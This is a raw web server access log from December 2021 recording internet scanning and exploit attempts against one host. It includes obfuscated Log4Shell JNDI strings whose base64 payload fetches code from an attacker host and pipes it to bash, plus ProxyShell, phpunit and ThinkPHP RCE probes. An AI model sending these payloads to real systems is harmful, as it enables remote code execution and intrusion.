"/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [22/Dec/2021:21:23:10 +0000] 444 - POST https 64.22.31.253 "/" [Client 185.215.164.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [22/Dec/2021:21:59:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Dec/2021:22:40:40 +0000] 400 - POST http localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [22/Dec/2021:23:18:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Dec/2021:23:32:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 182.161.66.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" "-" [22/Dec/2021:23:54:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Dec/2021:00:01:12 +0000] 444 - GET https 64.22.31.253 "/clover/gui/login.jsf" [Client 51.158.156.78] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0" "-" [23/Dec/2021:00:08:59 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [23/Dec/2021:00:31:30 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:01:40:32 +0000] 444 - GET https 64.22.31.253 "/${jndi:ldap://142.93.172.227:1389/Exploit}" [Client 89.22.180.140] [Length 0] [Gzip -] "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" "-" [23/Dec/2021:01:40:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.22.180.140] [Length 0] [Gzip -] "${jndi:ldap://142.93.172.227:1389/Exploit}" "-" [23/Dec/2021:01:40:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.22.180.140] [Length 0] [Gzip -] "curl/7.58.0" "-" [23/Dec/2021:01:40:36 +0000] 444 - GET https 64.22.31.253 "/?s=${jndi:ldap://142.93.172.227:1389/Exploit}" [Client 89.22.180.140] [Length 0] [Gzip -] "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" "-" [23/Dec/2021:02:16:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.57] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:02:16:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.42] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:02:16:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.44] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:02:16:26 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.42] [Length 252] [Gzip -] "-" "-" [23/Dec/2021:02:16:27 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.44] [Length 252] [Gzip -] "-" "-" [23/Dec/2021:02:16:27 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.57] [Length 252] [Gzip -] "-" "-" [23/Dec/2021:02:43:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.56.83.81] [Length 0] [Gzip -] "Firefox 35.0" "-" [23/Dec/2021:02:55:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 156.96.47.131] [Length 0] [Gzip -] "curl/7.29.0" "-" [23/Dec/2021:02:55:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 164.52.24.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" "-" [23/Dec/2021:03:26:47 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:03:26:48 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:04:08:18 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:04:08:18 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:04:16:01 +0000] 444 - GET https 64.22.31.253 "/${jndi:ldap://142.93.172.227:1389/Exploit}" [Client 89.22.180.140] [Length 0] [Gzip -] "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" "-" [23/Dec/2021:04:16:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.22.180.140] [Length 0] [Gzip -] "${jndi:ldap://142.93.172.227:1389/Exploit}" "-" [23/Dec/2021:04:16:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.22.180.140] [Length 0] [Gzip -] "curl/7.58.0" "-" [23/Dec/2021:04:16:06 +0000] 444 - GET https 64.22.31.253 "/?s=${jndi:ldap://142.93.172.227:1389/Exploit}" [Client 89.22.180.140] [Length 0] [Gzip -] "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" "-" [23/Dec/2021:04:26:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.59] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:04:26:02 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.59] [Length 252] [Gzip -] "-" "-" [23/Dec/2021:04:56:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [23/Dec/2021:04:56:24 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211223125624" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [23/Dec/2021:05:04:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Dec/2021:06:03:11 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.215.130] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Dec/2021:06:16:31 +0000] 400 - GET http localhost "/" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:06:21:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.79.128.124] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [23/Dec/2021:07:28:46 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:07:28:47 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:07:29:58 +0000] 400 - - http localhost "-" [Client 217.138.211.252] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:08:01:08 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:08:01:09 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:08:09:18 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.105] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Dec/2021:08:21:59 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.211.121] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Dec/2021:09:08:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.69] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:09:29:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 143.92.63.178] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:09:29:40 +0000] 400 - - http localhost "-" [Client 143.92.63.178] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:09:29:42 +0000] 400 - - http localhost "-" [Client 143.92.63.178] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:09:29:44 +0000] 400 - - http localhost "-" [Client 143.92.63.178] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:09:29:56 +0000] 400 - - https localhost "-" [Client 143.92.63.178] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:09:29:59 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 143.92.63.178] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Dec/2021:09:30:02 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 143.92.63.178] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Dec/2021:09:30:05 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 143.92.63.178] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Dec/2021:09:38:08 +0000] 444 - GET https 64.22.31.253 "/manage/account/login" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [23/Dec/2021:10:14:43 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.133.109.163] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [23/Dec/2021:10:17:10 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Dec/2021:10:26:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Dec/2021:10:39:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.60] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:10:39:13 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.60] [Length 252] [Gzip -] "-" "-" [23/Dec/2021:10:39:13 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [23/Dec/2021:11:28:37 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Dec/2021:12:05:46 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:12:05:47 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:12:34:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.41] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:12:34:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.41] [Length 252] [Gzip -] "-" "-" [23/Dec/2021:12:34:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.41] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [23/Dec/2021:12:43:30 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Dec/2021:13:09:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 147.182.159.103] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:13:09:34 +0000] 400 - - http localhost "-" [Client 147.182.159.103] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:13:09:35 +0000] 400 - - http localhost "-" [Client 147.182.159.103] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:13:09:35 +0000] 400 - - http localhost "-" [Client 147.182.159.103] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:13:09:47 +0000] 400 - - https localhost "-" [Client 147.182.159.103] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:13:09:51 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 147.182.159.103] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Dec/2021:13:09:53 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 147.182.159.103] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Dec/2021:13:09:55 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 147.182.159.103] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [23/Dec/2021:13:14:25 +0000] 400 - HEAD http localhost "/" [Client 137.184.19.254] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:13:14:25 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 137.184.19.254] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Dec/2021:13:14:25 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 137.184.19.254] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Dec/2021:13:14:27 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 137.184.19.254] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Dec/2021:13:14:27 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 137.184.19.254] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Dec/2021:13:14:27 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 137.184.19.254] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Dec/2021:13:14:27 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 137.184.19.254] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Dec/2021:13:14:28 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 137.184.19.254] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Dec/2021:13:14:28 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 137.184.19.254] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Dec/2021:13:14:28 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 137.184.19.254] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36" "-" [23/Dec/2021:13:14:28 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 137.184.19.254] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36" "-" [23/Dec/2021:13:14:29 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 137.184.19.254] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Dec/2021:13:14:29 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 137.184.19.254] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Dec/2021:13:14:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 137.184.19.254] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Dec/2021:13:14:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 137.184.19.254] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [23/Dec/2021:13:15:43 +0000] 400 - HEAD http localhost "/robots.txt" [Client 20.122.29.145] [Length 0] [Gzip -] "-" "-" [23/Dec/2021:13:17:59 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:13:17:59 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Dec/2021:13:27:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.196.237] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Dec/2021:13:30:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [23/Dec/2021:13:36:48 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Dec/2021:13:50:42 +0000] 444 - GET https remote.moralanimal.net "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 146.0.75.135] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [23/Dec/2021:14:15:01 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [23/Dec/2021:15:00:31 +0000] 400 - GET http localhost "/" [Client 125.64.94.140] [Length 252] [Gzip -] "-" "-" [23/Dec/2021:15:00:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 125.64.94.140] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [23/Dec/2021:15:00:34 +0000] 400 - GET http 64.22.31.253 "/favicon.ico" [Client 125.64.94.140] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [23/Dec/2021:15:00:35 +0000] 400 - GET http 64.22.31.253 "/robots.txt" [Client 125.64.94.140] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [23/Dec/2021:15:00:36 +0000] 400 - GET http 64.22.31.253 "/.well-known/security.txt" [Client 125.64.94.140] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [23/Dec/2021:15:03:10 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Dec/2021:15:21:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 85.159.213.176] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [23/Dec/2021:16:11:48 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Dec/2021:16:19:13 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.209.65] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Dec/2021:16:20:37 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.212.44] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Dec/2021:16:22:45 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.209.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Dec/2021:16:42:34 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Dec/2021:16:47:18 +0000] 444 - GET https 64.22.31.253 "/${jndi:ldap://90.84.178.188:1389/Exploit}" [Client 1.15.84.219] [Length 0] [Gzip -] "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" "-" [23/Dec/2021:16:47:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 1.15.84.219] [Length 0] [Gzip -] "${jndi:ldap://90.84.178.188:1389/Exploit}" "-" [23/Dec/2021:16:47:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 1.15.84.219] [Length 0] [Gzip -] "curl/7.58.0" "-" [23/Dec/2021:16:47:22 +0000] 444 - GET https 64.22.31.253 "/?s=${jndi:ldap://90.84.178.188:1389/Exploit}" [Client 1.15.84.219] [Length 0] [Gzip -] "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox" "-" [23/Dec/2021:18:02:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Dec/2021:18:24:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Dec/2021:18:31:50 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:18:31:50 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:18:57:31 +0000] 444 - GET https 64.22.31.253 "/solr/" [Client 23.90.160.114] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Dec/2021:19:26:35 +0000] 400 - POST http localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:20:26:43 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [23/Dec/2021:22:03:38 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [23/Dec/2021:22:21:56 +0000] 444 